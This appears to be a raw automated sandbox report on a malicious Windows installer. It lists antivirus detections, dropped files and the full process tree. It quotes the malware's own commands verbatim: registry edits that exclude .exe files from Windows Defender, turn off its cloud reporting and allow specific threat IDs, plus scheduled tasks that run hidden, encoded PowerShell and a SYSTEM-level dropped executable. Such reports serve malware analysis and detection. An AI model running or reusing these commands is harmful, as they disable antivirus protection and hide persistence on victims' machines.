Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Avira: detection malicious, Label: HEUR/AGEN.1250601 |
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe |
Avira: detection malicious, Label: HEUR/AGEN.1250601 |
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe |
Avira: detection malicious, Label: HEUR/AGEN.1250601 |
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
ReversingLabs: Detection: 51% |
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe |
ReversingLabs: Detection: 51% |
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe |
ReversingLabs: Detection: 51% |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0040553A FindFirstFileA, |
1_2_0040553A |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, |
1_2_004055DE |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\__data__\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\ |
Jump to behavior |
Source: powershell.exe, 00000018.00000002.420007208.00000173FD929000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.430262427.0000000000DCD000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000018.00000002.352296909.00000173E56E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.432102762.00000000037B1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: Install.exe, 00000005.00000002.484866347.0000000001ABA000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
|
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe |
Process created: Commandline size = 3260 |
|
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe |
Process created: Commandline size = 3260 |
Jump to behavior |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
File deleted: C:\Windows\SysWOW64\GroupPolicySMsYe |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
File created: C:\Windows\system32\GroupPolicy\gpt.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_004162A6 |
1_2_004162A6 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_0040E5A5 |
1_2_0040E5A5 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_004126B0 |
1_2_004126B0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00403A01 |
1_2_00403A01 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00418EF1 |
1_2_00418EF1 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 1_2_00418FCB |
1_2_00418FCB |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Code function: 24_2_00007FF9A5641988 |
24_2_00007FF9A5641988 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_00E4CA48 |
31_2_00E4CA48 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_00E48BA8 |
31_2_00E48BA8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_00E48BB0 |
31_2_00E48BB0 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_067DB790 |
31_2_067DB790 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_068DF0E8 |
31_2_068DF0E8 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_068D1000 |
31_2_068D1000 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_068D1010 |
31_2_068D1010 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_068E8658 |
31_2_068E8658 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_068DB4F9 |
31_2_068DB4F9 |
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00403A9C appears 33 times |
|
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00413954 appears 179 times |
|
Source: file.exe, 00000001.00000000.284047943.0000000000427000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: file.exe |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B |
Source: C:\Users\user\Desktop\file.exe |
File read: C:\Users\user\Desktop\file.exe |
Jump to behavior |
Source: file.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\file.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe .\Install.exe |
|
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe .\Install.exe /S /site_id "525403" |
|
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gAhELFxgt" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gAhELFxgt" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S |
|
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAc |